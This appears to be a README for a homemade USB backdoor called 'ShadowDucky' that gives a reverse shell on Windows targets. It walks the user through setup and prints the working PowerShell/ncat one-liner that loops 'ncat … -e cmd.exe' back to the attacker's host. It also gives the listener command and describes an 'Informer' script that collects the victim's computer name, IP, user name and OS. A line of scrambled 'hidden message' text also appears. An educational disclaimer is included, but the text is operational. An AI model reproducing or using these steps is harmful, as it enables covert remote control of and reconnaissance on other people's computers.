This is a homemade "Rubber Ducky." It provides the user with a reverse shell and can grab information for Windows-to-Windows applications.
- Most file paths in the files start with "D:" because its application is from a USB. The "ShadowDuckyV1.2A" folder is not needed; the proper format for the flash drive is how it's set up inside that folder.
- Shortcuts may need to be re-made for your application.
INFO: This is a USB remote backdoor. The program "ShadowDucky" will run when "ShadowDuckyV2.vsb" is double-clicked. Some files will have to be edited in Notepad to suit its application. Please follow the listed instructions below to help you properly run "ShadowDucky."
This was created as a project to learn PowerShell functionality, scripting with different coding languages, and reverse shelling. It is a reverse shell for Windows to Windows.
- Required resources will be PowerShell, Nmap, and Windows.
- ShadowDucky uses a combination of VBScript, ".bat" cmd, and PowerShell functionality.
- It runs in the background for better use.
Install "nmap" on both your computer and the target device to use ShadowDucky. Download Nmap.
Place the IP of your host device into "RubberDucky.bat." Enter the IP of the host and the PORT being used into that function. Example:
powershell -command do {ncat FF.FF.FF.FF PORT -e cmd.exe} until ($ping)
After changing settings, plug ShadowDucky USB into the target device, double-click ShadowDuckyV2.vbs, and watch the show. Return to the host device and use PowerShell with the following command to connect to the target device. Example:
ncat -l -p PORT -v
Enjoy! @-[:]
HIDDEN MESSAGE: sx& vqz& rlj& bulf& gost& kztg& djqp& gou& hzggtum& olt& huazj& ljf& sw& lnbulfv& sj& oubu& plndsja& lbqzjf&.& &Solfqp& qb& jqg& vqz& rljg& tuu& wu
ADVISORY & DISCLAIMER: This application was made for purely educational purposes. The developer will not be held liable for any misuse of this source code. Please ensure that if you are going to use "ShadowDucky," it is on your own devices or you have permission from the owner of the device(s).
NOTICE: Use Informer before ShadowDucky to get info to set up ShadowDucky for usage.
ShadowDucky Informer helps with getting the information you need to edit and use ShadowDucky. This Informer will give the user a printout in the ShadowDucky USB, Intel-Report Folder. The current computer's name, IPv4, User Name, and OS will be printed out into Intel-Report.txt.
- Double-click Informer.vbs and wait a minute for your report to be given.
- After one minute, check the Intel-Report Folder and use the information in the ".txt" to set up ShadowDucky.
- Read the "README.txt" in the README Folder.
DISCLAIMER: This application was made for purely educational purposes. The developer will not be held liable for any misuse of this source code. Please ensure that if you are going to use "ShadowDucky," it is on your own devices or you have permission from the owner of the device(s).
Please Be Responsible
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